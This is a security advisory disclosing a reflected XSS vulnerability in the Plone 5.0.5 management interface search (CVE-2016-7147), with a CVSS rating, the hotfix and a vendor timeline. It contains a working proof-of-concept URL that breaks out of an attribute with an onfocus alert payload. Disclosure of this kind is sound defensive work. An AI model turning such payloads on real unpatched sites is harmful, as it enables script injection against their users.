Plone: XSS
Date: 2017-01-26 10:28:581. Introduction
| Affected Product: | Plone 5.0.5 |
| Fixed in: | Hotfix 20170117 |
| Fixed Version Link: | https://plone.org/security/hotfix/20170117 |
| Vendor Contact: | security@plone.org |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/05/2016 |
| Disclosed to public: | 01/26/2017 |
| Release mode: | Coordinated Release |
| CVE: | CVE-2016-7147 |
| Credits | Tim Coen of Curesec GmbH |
2. Overview
Plone is an open source CMS written in python. In version 5.0.5, the Zope Management Interface (ZMI) component is vulnerable to reflected XSS as it does not properly encode double quotes.
3. Details
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: The search functionality of the management interface is vulnerable to reflected XSS. As the input is echoed into an HMTL attribute, an attacker can use double quotes to escape the current attribute and add new attributes to enter a JavaScript context.
Proof of Concept:
http://0.0.0.0:9090//Plone/manage_findResult?obj_metatypes%3Alist=all&obj_ids%3Atokens=%22+autofocus+onfocus%3dalert(1)%3E&obj_searchterm=&obj_mspec=%3C&obj_mtime=&search_sub%3Aint=1&btn_submit=Find
4. Solution
To mitigate this issue please apply the hotfix 20170117.
Please note that a newer version might already be available.
5. Report Timeline
| 09/05/2016 | Contacted Vendor, Vendor confirmed, Requested CVE |
| 09/06/2016 | CVE assigned |
| 09/06/2016 | Vendor requests 90 days to release fix |
| 01/10/2017 | Contacted Vendor Again, Vendor announces hotfix |
| 01/17/2017 | Vendor releases hotfix |
| 01/26/2017 | Disclosed to public |